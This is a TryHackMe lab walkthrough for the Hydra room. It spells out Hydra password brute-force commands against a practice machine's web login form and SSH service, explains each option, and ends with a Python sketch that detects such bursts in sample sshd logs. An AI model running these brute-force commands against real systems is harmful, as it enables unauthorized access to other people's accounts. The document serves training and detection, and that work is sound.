TryHackMe: Hydra Walkthrough
--
Task [1] Hydra Introduction
Task [2] Using Hydra
Read the information carefully.
Use nmap to check the open ports. The open ports are 22 and 80 and the services running are ssh and http respectively.
#1 Use Hydra to bruteforce molly’s web password. What is flag 1?
Command used: hydra -l molly -P rockyou.txt MACHINE_IP http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
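-l specifies the username
-P specifies the password list
http-post-form selects Hydra's module for HTML login forms submitted with a POST request
/login is the login page URL
username= is the form field for the username
^USER^ tells Hydra to put the username at this location
password= is the form field for the password
^PASS^ tells Hydra to put the password at this location
F=incorrect marks an attempt as failed when the response contains the word "incorrect"
-V gives verbose output
The colons inside the quoted string separate its three parts: the path, the POST body and the failure condition.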
After several attempts we found the password.
Use the username and password to log in.
There we find flag 1.
#2 Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Command used: hydra -l molly -P rockyou.txt MACHINE_IP -t 4 ssh
-l used to specify username
-P used to specify password list
-t specifies the number of threads to use
After several attempts we found the password.
Use the command ssh molly@MACHINE_IP to connect to the SSH service, with the password found above. There we find flag 2.
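Seen from the server, the SSH run above appears in the sshd log as a burst of failed passwords for one user from one address, followed by a success. The Python sketch below is an added example, not part of the original walkthrough; the log lines, the addresses, the user bob, the threshold, the window and the assumed year are all constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (documentation addresses; "bob" is a made-up user).
SAMPLE_LOG = "\n".join(
    [f"Mar 10 10:00:{s:02d} web sshd[{1000 + s}]: Failed password for molly "
     f"from 203.0.113.7 port {40000 + s} ssh2" for s in range(1, 9)]
    + ["Mar 10 10:00:09 web sshd[1009]: Accepted password for molly "
       "from 203.0.113.7 port 40009 ssh2",
       "Mar 10 10:05:00 web sshd[1100]: Failed password for bob "
       "from 198.51.100.20 port 50000 ssh2",
       "Mar 10 10:05:10 web sshd[1101]: Accepted password for bob "
       "from 198.51.100.20 port 50001 ssh2"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {(ip, user): verdict} for bursts of failed SSH password logins."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Classic syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        q = recent[key]
        while q and ts - q[0] > window:   # drop failures outside the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                alerts.setdefault(key, "bruteforce")
        elif key in alerts:
            # A success from an already flagged source means the guess likely worked.
            alerts[key] = "bruteforce-then-login"
    return alerts

if __name__ == "__main__":
    for (ip, user), verdict in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} -> {user}: {verdict}")
```

The single mistyped password for bob stays below the threshold, so only the burst against molly is reported.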
Thank you…